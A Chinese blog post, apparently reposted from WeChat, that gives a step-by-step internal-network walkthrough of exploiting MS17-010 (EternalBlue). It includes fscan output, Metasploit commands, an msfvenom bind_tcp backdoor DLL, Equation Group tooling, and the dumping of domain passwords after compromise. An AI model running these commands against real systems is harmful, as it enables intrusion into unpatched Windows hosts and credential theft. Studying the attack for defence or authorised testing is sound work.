欢迎转发,请勿抄袭
永恒之蓝,该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,攻击成功后将被用来传播病毒木马。由于利用永恒之蓝漏洞利用工具进行传播病毒木马事件多,影响特大,因此很多时候默认将ms17-010漏洞称为“永恒之蓝”。
在内网中经常能见到这个漏洞,在没有杀软的情况下且未打补丁的情况下。这个漏洞将是打穿内网的一个突破口。常见存在的系统有xp、2003、2008、2012、win7。
常规手段,进入内网后,上传fscan进行扫描,会显示一些漏洞信息,如下存在ms17-010
[+] 172.16.122.151 MS17-010 (Windows 7 Ultimate 7601 Service Pack 1)
使用msf进行正向攻击
proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp(使用正向payload)
set RHost 172.16.122.151
set LPORT 8888
run
执行完之后,就已经发起攻击了。
显然,漏洞存在,但是没利用成功!出现这样情况多半是payload过去了,但是没能正常执行。那么尝试使用方程式进行利用。
先使用msf生成一个dll文件,作为攻击生成的后门。
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -f dll >x64.dll
并使用方程式工具检测该漏洞,并且是存在该漏洞。
将生成的dll文件复制到方程式工具下,进行利用测试,发现是可以利用成功的。
使用msf进行正向连接受害机器。
proxychains msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp(使用正向payload)
set RHost 172.16.122.151
set LPORT 4444(与前面dll设置的端口对应)
run
进行连接测试。
已经可以正常连接,这里需要注意的是,不能执行shell来获取交互式会话。否则就会。
但是可以执行msf的命令,如读取密码。
很大可能抓到密码,如上就抓到域成员密码。结合域控漏洞利用,最后上一个域控的截图。
总结:一个历史老漏洞,但这能给内网带来被沦陷的灾难!
文章声明:该工具、教程仅供学习参考,请勿非法使用。否则与作者无关!
原文始发于微信公众号(yudays实验室):内网常见漏洞之永恒之蓝
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论